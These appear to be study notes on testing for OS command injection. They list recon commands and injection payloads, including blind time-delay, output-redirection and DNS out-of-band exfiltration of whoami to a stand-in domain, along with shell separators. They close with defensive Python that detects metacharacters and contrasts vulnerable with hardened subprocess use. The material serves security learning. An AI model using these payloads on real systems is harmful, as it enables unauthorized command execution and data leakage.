OS command injection

Useful commands

| Purpose of command      | Linux       | Windows        |
|-------------------------|-------------|----------------|
| Name of current user    | whoami      | whoami         |
| Operating system        | uname -a    | ver            |
| Network configuration   | ifconfig    | ipconfig /all  |
| Network connections     | netstat -an | netstat -an    |
| Running processes       | ps -ef      | tasklist       |

How to Test this Vulnerability

  • Simple case

    Try appending |whoami to the end of a parameter that is passed to the back end and observe the response.

    This case works when the application applies no defense against this type of attack.

  • Blind OS command injection vulnerabilities

    The application does not return the output from the command within its HTTP response.

    For example, consider a web site that lets users submit feedback about the site.

    How to detect:

    • Detecting blind OS command injection using time delays

      Append ||ping -c 10 127.0.0.1|| to the parameter; if the response is delayed, the parameter is vulnerable.

    • Exploiting blind OS command injection by redirecting output

      Append ||whoami > /var/www/static/whoami.txt||, then find a function that retrieves files from that folder and alter the request so it fetches whoami.txt.

    • Exploiting blind OS command injection using out-of-band (OAST) techniques

      Append || nslookup yoursite.com ||, then check your logs or use a Burp Collaborator URL.

      Append ||nslookup+whoami.yoursite.com||, then check your logs or use a Burp Collaborator URL.

Ways of injecting OS commands

A variety of shell metacharacters can be used to perform OS command injection attacks.

A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:

  • &

  • &&

  • |

  • ||

The following command separators work only on Unix-based systems:

  • ;

  • Newline (0x0a or \n)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

  • `injected command`

  • $( injected command )

Note that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.

Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.
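The following Python is an added example, not code from the original page. It ties the "How to Test" section and the metacharacter list above together from the defender's side: a detection rule that flags the separators and inline-execution tokens listed here (including the quote-termination pattern), next to the vulnerable string-concatenation pattern and its hardened argv form. The hostname parameter and its allow-list are assumptions for illustration.

```python
import re

# Separators and inline-execution tokens from the page, longest first so
# that "&&" and "||" are reported as one token rather than two.
SEPARATORS = ["&&", "||", "&", "|", ";", "\n", "`", "$("]
_SEP_RE = re.compile("|".join(re.escape(s) for s in SEPARATORS))

# Assumed shape of a legitimate hostname/IP parameter (strict allow-list).
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def find_metacharacters(value: str) -> list:
    """Return every separator / inline-execution token found in a parameter.

    Useful as a detection rule over request parameters or access-log fields:
    a hit on a field that should only carry a hostname or product ID is a
    strong signal of an injection attempt, blind variants included, since
    the payload still has to carry one of these tokens.
    """
    return _SEP_RE.findall(value)


def breaks_quoted_context(value: str) -> bool:
    """Flag input that closes a quoted context and then uses a separator,
    the pattern used when the input lands inside quotes in the command."""
    return bool(re.search(r"""["'].*?(&&|\|\||[&|;`]|\$\()""", value, re.S))


def unsafe_command(host: str) -> str:
    """The vulnerable pattern: user input concatenated into a shell string.
    Only builds the string here; executing it with shell=True is the bug."""
    return f"ping -c 1 {host}"


def is_valid_host(host: str) -> bool:
    """Allow-list check: reject anything that is not a plain hostname/IP."""
    return _HOST_RE.fullmatch(host) is not None


def safe_argv(host: str) -> list:
    """Hardened form: validate, then pass an argv list to subprocess.run
    without shell=True, so "|", ";" or "$(" stay inert characters in one
    argument that no shell ever interprets."""
    if not is_valid_host(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]
```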
